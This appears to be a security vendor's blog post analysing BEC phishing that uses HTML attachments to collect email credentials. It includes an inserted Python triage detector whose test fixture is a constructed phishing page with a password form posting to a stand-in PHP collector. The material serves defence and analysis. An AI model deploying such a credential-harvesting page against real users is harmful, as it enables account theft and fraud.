How HTML Attachments and Phishing Are Used In BEC Attacks

  • Posted on: July 27, 2017 at 7:00 am
  • Posted in: Social, Targeted Attacks
  • Author: Lord Alfred Remorin (Senior Threat Researcher)

Traditionally, BEC attacks have used keyloggers to steal saved account information from target machines. However, an executable attachment usually warns users not to open it, since there is a high chance that such a file is malicious. As a result, we’ve seen a trend wherein the attached files are no longer executables but HTML pages:

Figure 1. Phishing Email with HTML attachment

Opening the attachment will launch a browser with the following content:

Figure 2. HTML Phishing page

The page asks the user to enter their username and password to view the document file. To lure the user into entering email account credentials, the attackers added logos of popular email providers like Gmail, Outlook, and Yahoo Mail.

When a victim enters their username/password and submits the form, the credentials are then sent to a PHP script configured by the attacker. Usually, this script is configured to send the credentials to an email account controlled by the attacker.

Figure 3. HTML source code with POST command
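A triage check for the pattern just described (a password form inside a locally opened HTML attachment that POSTs to a remote PHP script and borrows email provider logos), as an added example that is not part of the original post. It uses only the Python standard library; the brand list, the two sample attachments and the host example.invalid are constructed for illustration.

```python
"""Triage an HTML e-mail attachment for the credential-harvesting pattern described above."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Provider names whose logos the lure borrows (hypothetical list built from the brands named above).
EMAIL_BRANDS = ("gmail", "outlook", "yahoo", "hotmail", "163")

class _FormScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.forms = []   # each: {"action": str, "method": str, "inputs": [input types]}
        self.images = []  # lower-cased src of every <img>

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.forms.append({"action": a.get("action", ""),
                               "method": (a.get("method") or "get").lower(), "inputs": []})
        elif tag == "input" and self.forms:
            self.forms[-1]["inputs"].append((a.get("type") or "text").lower())
        elif tag == "img":
            self.images.append(a.get("src", "").lower())

def triage_attachment(html: str) -> dict:
    """Return the indicators found; suspicious when a password form POSTs to a remote host."""
    scanner = _FormScanner()
    scanner.feed(html)
    credential_form_external, php_actions = False, []
    for form in scanner.forms:
        target = urlparse(form["action"])
        # A locally opened file has nothing to submit to: an absolute URL means the credentials leave the machine.
        if "password" in form["inputs"] and form["method"] == "post" and target.netloc:
            credential_form_external = True
        if target.path.lower().endswith(".php"):
            php_actions.append(form["action"])
    brand_logos = sorted(b for b in EMAIL_BRANDS if any(b in src for src in scanner.images))
    return {"credential_form_external": credential_form_external, "php_actions": php_actions,
            "brand_logos": brand_logos, "suspicious": credential_form_external}

# Constructed sample modelled on the attachment described above; not the real file.
SAMPLE_PHISH = """<html><body>
<img src="img/gmail_logo.png"><img src="img/outlook.png"><img src="img/yahoo_mail.png">
<p>Sign in with your e-mail account to view the document.</p>
<form method="POST" action="http://example.invalid/collect.php">
  <input type="text" name="user"><input type="password" name="pass">
  <input type="submit" value="View Document">
</form></body></html>"""
# Constructed benign attachment: no form and no borrowed logos.
SAMPLE_BENIGN = '<html><body><p>Quarterly report attached.</p><img src="company_logo.png"></body></html>'
```

Run `triage_attachment(SAMPLE_PHISH)` on a quarantined attachment's HTML to get the indicator dictionary; the check is a heuristic for mail-gateway triage, not a replacement for detonating the file.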

Checking the source code of the HTML attachment indicates that it was probably coded in Nigeria, as the Google link was set to a version for that country.

Figure 4. URL with localized Google domain

This makes even more sense if one considers what we found on Nigerian forums. Nairaland (a popular Nigerian forum) contained an advertisement for scam pages. The seller offers different scam pages for various email services like 163 Mail, Gmail, Hotmail, and Yahoo Mail.

Figure 5. Website with scam pages for email services

Keyloggers are still commonly used by BEC actors to retrieve the accounts of their victims and are very effective. However, delivering an executable file through email can be difficult nowadays, as anti-spam rules will quickly flag these messages. On the other hand, an HTML file is not treated as an immediate threat unless it has been verified to be a phishing page.

A phishing page can be easily coded and deployed, unlike a keylogger, which requires some coding knowledge. A phishing page will also run on any platform, as it only needs a browser, whereas a keylogger depends on the platform its builder targets.

One disadvantage of phishing pages compared to keyloggers is how they obtain passwords from their victims. For a phishing page, a user needs to enter their credentials into a form and submit it. A keylogger only needs to be executed once and will then keep running in the background.

In summary:

                            Keyloggers                                            HTML phishing page
Password recovery           No user interaction needed once the keylogger runs    User needs to enter credentials
Multiple account recovery   Yes                                                   No
Multi-platform              No                                                    Yes

Table 1. Differences between HTML phishing pages and keyloggers

HTML Attachments – Statistics

To gain more insight, we looked into feedback information from our products via the Smart Protection Network. From July 1, 2016 to June 30, 2017, we found 14,867 records and 6,664 unique hashes.

The following chart shows the number of cases seen per month:

Figure 6. Number of BEC-related phishing attacks per month

The following chart shows where the above incidents were recorded:

Figure 7. Location of BEC-related phishing attacks

The following chart indicates the keywords used in these attachments:

Figure 8. Keywords used in BEC-related phishing attacks

Other Phishing Email and Attachment Samples

The SHA256 hashes of the samples used in the original screenshots are the following:

  • 1b369df9ea0f75b5d40aa60c649f12d174e28f1177a473775d2d5454e4ca131c
  • ac5f29a25e918691f4949587290e9ef6ca4dae1398d3e4a1e5fe69687a67eab0

Below are several samples of other attacks that use this methodology:

Figures 9 to 13. Various phishing emails and websites used in BEC attacks

We recently talked about this topic at the RSA Conference 2017 Asia Pacific & Japan, which was held in Singapore from July 26 to 28. Our Phish Insight service tests the ability of organizations to resist online scams, allowing administrators to judge the level of risk they are currently exposed to.
